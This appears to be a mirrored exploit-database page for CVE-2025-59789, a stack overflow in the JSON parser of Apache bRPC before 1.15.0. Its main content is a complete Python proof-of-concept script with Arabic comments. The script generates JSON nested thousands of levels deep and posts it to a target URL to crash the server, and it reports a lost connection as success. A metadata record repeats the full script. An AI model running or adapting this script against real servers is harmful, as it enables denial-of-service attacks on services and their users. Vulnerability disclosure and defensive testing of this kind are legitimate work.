📄 Apache bRPC Stack Overflow_PACKETSTORM:212503

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Description

A critical stack overflow vulnerability in Apache bRPC's JSON parser allows remote attackers to crash servers via specially crafted deep recursive JSON data. Versions prior to 1.15.0 are affected...

Visit Original Source

Basic Information

ID PACKETSTORM:212503

Published Dec 5, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Apache bRPC prior to 1.15.0 Stack Overflow via Deep Recursive JSON |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://brpc.apache.org/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212248/ & CVE-2025-59789

[+] Summary : Critical stack overflow vulnerability in Apache bRPC's JSON parser that allows remote attackers to crash servers via specially crafted deep recursive JSON data.

[+] POC : python poc.py

#!/usr/bin/env python3
"""
Proof of Concept (PoC) for CVE-2025-59789
by indoushka
"""

import json
import requests
import sys

def generate_deep_nested_json(depth=1000):
"""
إنشاء JSON مع بنية متداخلة بعمق كبير
"""
data = {}
current = data

for i in range(depth):
current["nested"] = {}
current = current["nested"]

current["value"] = "exploit"
return json.dumps(data)

def generate_deep_array_json(depth=1000):
"""
إنشاء JSON مع مصفوفة متداخلة بعمق كبير
"""
data = []
current = data

for i in range(depth):
new_array = []
current.append(new_array)
current = new_array

current.append("exploit")
return json.dumps(data)

def send_exploit(target_url, depth=10000, exploit_type="object"):
"""
إرسال بيانات JSON متداخلة بعمق لاستغلال الثغرة

Args:
target_url: عنوان URL للخادم المتأثر
depth: عمق التداخل (كلما زاد العمق، زاد احتمال التسبب في stack overflow)
exploit_type: نوع البيانات ("object" أو "array")
"""

print(f"[*] إعداد هجوم Stack Overflow على: {target_url}")
print(f"[*] نوع الاستغلال: {exploit_type}")
print(f"[*] عمق التداخل: {depth}")

# إنشاء بيانات JSON متداخلة
if exploit_type == "object":
print("[*] إنشاء JSON مع كائنات متداخلة...")
payload = generate_deep_nested_json(depth)
else:
print("[*] إنشاء JSON مع مصفوفات متداخلة...")
payload = generate_deep_array_json(depth)

print(f"[*] حجم الحمولة: {len(payload)} بايت")

# إعداد الهيدرات (تعديل حسب واجهة بروتوكول الخادم)
headers = {
'Content-Type': 'application/json',
'User-Agent': 'CVE-2025-59789-PoC'
}

try:
print("[*] إرسال الطلب...")
response = requests.post(
target_url,
data=payload,
headers=headers,
timeout=30
)

print(f"[*] استجابة الخادم: {response.status_code}")

# التحقق من تأثير الهجوم
if response.status_code >= 500:
print("[+] نجاح محتمل! قد يكون الخادم قد تعطل")
else:
print("[-] الخادم لا يزال يستجيب")

except requests.exceptions.ConnectionError:
print("[+] نجاح! فقد الاتصال بالخادم - ربما تعطل بسبب stack overflow")
except requests.exceptions.ReadTimeout:
print("[+] نجاح محتمل! انتهت مهلة الخادم - ربما هو في حالة توقف")
except Exception as e:
print(f"[!] خطأ: {e}")

def check_vulnerability(target_url):
"""
التحقق من وجود الثغرة بإرسال عمق تداخل متوسط
"""
print("[*] التحقق من وجود الثغرة...")

# عمق آمن للاختبار (أقل من 100)
safe_depth = 50
safe_payload = generate_deep_nested_json(safe_depth)

headers = {
'Content-Type': 'application/json'
}

try:
response = requests.post(
target_url,
data=safe_payload,
headers=headers,
timeout=10
)

if response.status_code == 200:
print("[*] الخادم يستجيب للبيانات المتداخلة الآمنة")

# محاولة بعمق أكبر (200 - يجب أن يفشل في الإصدار المصحح)
dangerous_depth = 200
dangerous_payload = generate_deep_nested_json(dangerous_depth)

try:
response2 = requests.post(
target_url,
data=dangerous_payload,
headers=headers,
timeout=10
)

if response2.status_code == 200:
print("[-] الخادم يقبل عمق 200 - ربما غير مصحح")
else:
print("[+] الخادم يرفض عمق 200 - ربما تم تصحيحه")

except:
print("[+] الخادم قد يكون متأثراً")

except Exception as e:
print(f"[!] خطأ في التحقق: {e}")

if __name__ == "__main__":
print("=" * 60)
print("PoC for CVE-2025-59789 - Apache bRPC Stack Overflow")
print("Affected: bRPC < 1.15.0 with json2pb component")
print("=" * 60)

if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url> [depth] [type]")
print(f"Example: {sys.argv[0]} http://localhost:8080/api 10000 object")
print(f"Example: {sys.argv[0]} http://localhost:8080/api 5000 array")
print(f"Check: {sys.argv[0]} http://localhost:8080/api check")
sys.exit(1)

target_url = sys.argv[1]

if len(sys.argv) > 2 and sys.argv[2] == "check":
check_vulnerability(target_url)
else:
depth = int(sys.argv[2]) if len(sys.argv) > 2 else 10000
exploit_type = sys.argv[3] if len(sys.argv) > 3 else "object"

if depth > 100000:
print("[!] تحذير: عمق كبير جداً قد يتسبب في مشاكل للجهاز المهاجم")
confirm = input("[?] هل تريد المتابعة؟ (y/n): ")
if confirm.lower() != 'y':
sys.exit(0)

send_exploit(target_url, depth, exploit_type)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-05T18:52:10",
    "description": "A critical stack overflow vulnerability in Apache bRPC's JSON parser allows remote attackers to crash servers via specially crafted deep recursive JSON data. Versions prior to 1.15.0 are affected...",
    "published": "2025-12-05T00:00:00",
    "modified": "2025-12-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Apache bRPC Stack Overflow",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212503",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-59789"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Apache bRPC prior to 1.15.0 Stack Overflow via Deep Recursive JSON                                                          |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://brpc.apache.org/                                                                                                    |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212248/ & CVE-2025-59789\n    \n    [+] Summary : Critical stack overflow vulnerability in Apache bRPC's JSON parser that allows remote attackers to crash servers via specially crafted deep recursive JSON data.\n    \n    [+]  POC : python poc.py\n    \n    #!/usr/bin/env python3\n    \"\"\"\n    Proof of Concept (PoC) for CVE-2025-59789\n    by indoushka\n    \"\"\"\n    \n    import json\n    import requests\n    import sys\n    \n    def generate_deep_nested_json(depth=1000):\n        \"\"\"\n        \u0625\u0646\u0634\u0627\u0621 JSON \u0645\u0639 \u0628\u0646\u064a\u0629 \u0645\u062a\u062f\u0627\u062e\u0644\u0629 \u0628\u0639\u0645\u0642 \u0643\u0628\u064a\u0631\n        \"\"\"\n        data = {}\n        current = data\n        \n        for i in range(depth):\n            current[\"nested\"] = {}\n            current = current[\"nested\"]\n        \n        current[\"value\"] = \"exploit\"\n        return json.dumps(data)\n    \n    def generate_deep_array_json(depth=1000):\n        \"\"\"\n        \u0625\u0646\u0634\u0627\u0621 JSON \u0645\u0639 \u0645\u0635\u0641\u0648\u0641\u0629 \u0645\u062a\u062f\u0627\u062e\u0644\u0629 \u0628\u0639\u0645\u0642 \u0643\u0628\u064a\u0631\n        \"\"\"\n        data = []\n        current = data\n        \n        for i in range(depth):\n            new_array = []\n            current.append(new_array)\n            current = new_array\n        \n        current.append(\"exploit\")\n        return json.dumps(data)\n    \n    def send_exploit(target_url, depth=10000, exploit_type=\"object\"):\n        \"\"\"\n        \u0625\u0631\u0633\u0627\u0644 \u0628\u064a\u0627\u0646\u0627\u062a JSON \u0645\u062a\u062f\u0627\u062e\u0644\u0629 \u0628\u0639\u0645\u0642 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629\n        \n        Args:\n            target_url: \u0639\u0646\u0648\u0627\u0646 URL \u0644\u0644\u062e\u0627\u062f\u0645 \u0627\u0644\u0645\u062a\u0623\u062b\u0631\n            depth: \u0639\u0645\u0642 \u0627\u0644\u062a\u062f\u0627\u062e\u0644 (\u0643\u0644\u0645\u0627 \u0632\u0627\u062f \u0627\u0644\u0639\u0645\u0642\u060c \u0632\u0627\u062f \u0627\u062d\u062a\u0645\u0627\u0644 \u0627\u0644\u062a\u0633\u0628\u0628 \u0641\u064a stack overflow)\n            exploit_type: \u0646\u0648\u0639 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a (\"object\" \u0623\u0648 \"array\")\n        \"\"\"\n        \n        print(f\"[*] \u0625\u0639\u062f\u0627\u062f \u0647\u062c\u0648\u0645 Stack Overflow \u0639\u0644\u0649: {target_url}\")\n        print(f\"[*] \u0646\u0648\u0639 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644: {exploit_type}\")\n        print(f\"[*] \u0639\u0645\u0642 \u0627\u0644\u062a\u062f\u0627\u062e\u0644: {depth}\")\n        \n        # \u0625\u0646\u0634\u0627\u0621 \u0628\u064a\u0627\u0646\u0627\u062a JSON \u0645\u062a\u062f\u0627\u062e\u0644\u0629\n        if exploit_type == \"object\":\n            print(\"[*] \u0625\u0646\u0634\u0627\u0621 JSON \u0645\u0639 \u0643\u0627\u0626\u0646\u0627\u062a \u0645\u062a\u062f\u0627\u062e\u0644\u0629...\")\n            payload = generate_deep_nested_json(depth)\n        else:\n            print(\"[*] \u0625\u0646\u0634\u0627\u0621 JSON \u0645\u0639 \u0645\u0635\u0641\u0648\u0641\u0627\u062a \u0645\u062a\u062f\u0627\u062e\u0644\u0629...\")\n            payload = generate_deep_array_json(depth)\n        \n        print(f\"[*] \u062d\u062c\u0645 \u0627\u0644\u062d\u0645\u0648\u0644\u0629: {len(payload)} \u0628\u0627\u064a\u062a\")\n        \n        # \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0647\u064a\u062f\u0631\u0627\u062a (\u062a\u0639\u062f\u064a\u0644 \u062d\u0633\u0628 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0627\u0644\u062e\u0627\u062f\u0645)\n        headers = {\n            'Content-Type': 'application/json',\n            'User-Agent': 'CVE-2025-59789-PoC'\n        }\n        \n        try:\n            print(\"[*] \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0637\u0644\u0628...\")\n            response = requests.post(\n                target_url,\n                data=payload,\n                headers=headers,\n                timeout=30\n            )\n            \n            print(f\"[*] \u0627\u0633\u062a\u062c\u0627\u0628\u0629 \u0627\u0644\u062e\u0627\u062f\u0645: {response.status_code}\")\n            \n            # \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u062a\u0623\u062b\u064a\u0631 \u0627\u0644\u0647\u062c\u0648\u0645\n            if response.status_code >= 500:\n                print(\"[+] \u0646\u062c\u0627\u062d \u0645\u062d\u062a\u0645\u0644! \u0642\u062f \u064a\u0643\u0648\u0646 \u0627\u0644\u062e\u0627\u062f\u0645 \u0642\u062f \u062a\u0639\u0637\u0644\")\n            else:\n                print(\"[-] \u0627\u0644\u062e\u0627\u062f\u0645 \u0644\u0627 \u064a\u0632\u0627\u0644 \u064a\u0633\u062a\u062c\u064a\u0628\")\n                \n        except requests.exceptions.ConnectionError:\n            print(\"[+] \u0646\u062c\u0627\u062d! \u0641\u0642\u062f \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u062e\u0627\u062f\u0645 - \u0631\u0628\u0645\u0627 \u062a\u0639\u0637\u0644 \u0628\u0633\u0628\u0628 stack overflow\")\n        except requests.exceptions.ReadTimeout:\n            print(\"[+] \u0646\u062c\u0627\u062d \u0645\u062d\u062a\u0645\u0644! \u0627\u0646\u062a\u0647\u062a \u0645\u0647\u0644\u0629 \u0627\u0644\u062e\u0627\u062f\u0645 - \u0631\u0628\u0645\u0627 \u0647\u0648 \u0641\u064a \u062d\u0627\u0644\u0629 \u062a\u0648\u0642\u0641\")\n        except Exception as e:\n            print(f\"[!] \u062e\u0637\u0623: {e}\")\n    \n    def check_vulnerability(target_url):\n        \"\"\"\n        \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u0625\u0631\u0633\u0627\u0644 \u0639\u0645\u0642 \u062a\u062f\u0627\u062e\u0644 \u0645\u062a\u0648\u0633\u0637\n        \"\"\"\n        print(\"[*] \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629...\")\n        \n        # \u0639\u0645\u0642 \u0622\u0645\u0646 \u0644\u0644\u0627\u062e\u062a\u0628\u0627\u0631 (\u0623\u0642\u0644 \u0645\u0646 100)\n        safe_depth = 50\n        safe_payload = generate_deep_nested_json(safe_depth)\n        \n        headers = {\n            'Content-Type': 'application/json'\n        }\n        \n        try:\n            response = requests.post(\n                target_url,\n                data=safe_payload,\n                headers=headers,\n                timeout=10\n            )\n            \n            if response.status_code == 200:\n                print(\"[*] \u0627\u0644\u062e\u0627\u062f\u0645 \u064a\u0633\u062a\u062c\u064a\u0628 \u0644\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u062a\u062f\u0627\u062e\u0644\u0629 \u0627\u0644\u0622\u0645\u0646\u0629\")\n                \n                # \u0645\u062d\u0627\u0648\u0644\u0629 \u0628\u0639\u0645\u0642 \u0623\u0643\u0628\u0631 (200 - \u064a\u062c\u0628 \u0623\u0646 \u064a\u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0645\u0635\u062d\u062d)\n                dangerous_depth = 200\n                dangerous_payload = generate_deep_nested_json(dangerous_depth)\n                \n                try:\n                    response2 = requests.post(\n                        target_url,\n                        data=dangerous_payload,\n                        headers=headers,\n                        timeout=10\n                    )\n                    \n                    if response2.status_code == 200:\n                        print(\"[-] \u0627\u0644\u062e\u0627\u062f\u0645 \u064a\u0642\u0628\u0644 \u0639\u0645\u0642 200 - \u0631\u0628\u0645\u0627 \u063a\u064a\u0631 \u0645\u0635\u062d\u062d\")\n                    else:\n                        print(\"[+] \u0627\u0644\u062e\u0627\u062f\u0645 \u064a\u0631\u0641\u0636 \u0639\u0645\u0642 200 - \u0631\u0628\u0645\u0627 \u062a\u0645 \u062a\u0635\u062d\u064a\u062d\u0647\")\n                        \n                except:\n                    print(\"[+] \u0627\u0644\u062e\u0627\u062f\u0645 \u0642\u062f \u064a\u0643\u0648\u0646 \u0645\u062a\u0623\u062b\u0631\u0627\u064b\")\n                    \n        except Exception as e:\n            print(f\"[!] \u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u062a\u062d\u0642\u0642: {e}\")\n    \n    if __name__ == \"__main__\":\n        print(\"=\" * 60)\n        print(\"PoC for CVE-2025-59789 - Apache bRPC Stack Overflow\")\n        print(\"Affected: bRPC < 1.15.0 with json2pb component\")\n        print(\"=\" * 60)\n        \n        if len(sys.argv) < 2:\n            print(f\"Usage: {sys.argv[0]} <target_url> [depth] [type]\")\n            print(f\"Example: {sys.argv[0]} http://localhost:8080/api 10000 object\")\n            print(f\"Example: {sys.argv[0]} http://localhost:8080/api 5000 array\")\n            print(f\"Check: {sys.argv[0]} http://localhost:8080/api check\")\n            sys.exit(1)\n        \n        target_url = sys.argv[1]\n        \n        if len(sys.argv) > 2 and sys.argv[2] == \"check\":\n            check_vulnerability(target_url)\n        else:\n            depth = int(sys.argv[2]) if len(sys.argv) > 2 else 10000\n            exploit_type = sys.argv[3] if len(sys.argv) > 3 else \"object\"\n            \n            if depth > 100000:\n                print(\"[!] \u062a\u062d\u0630\u064a\u0631: \u0639\u0645\u0642 \u0643\u0628\u064a\u0631 \u062c\u062f\u0627\u064b \u0642\u062f \u064a\u062a\u0633\u0628\u0628 \u0641\u064a \u0645\u0634\u0627\u0643\u0644 \u0644\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\")\n                confirm = input(\"[?] \u0647\u0644 \u062a\u0631\u064a\u062f \u0627\u0644\u0645\u062a\u0627\u0628\u0639\u0629\u061f (y/n): \")\n                if confirm.lower() != 'y':\n                    sys.exit(0)\n            \n            send_exploit(target_url, depth, exploit_type)\n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212503",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212503/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply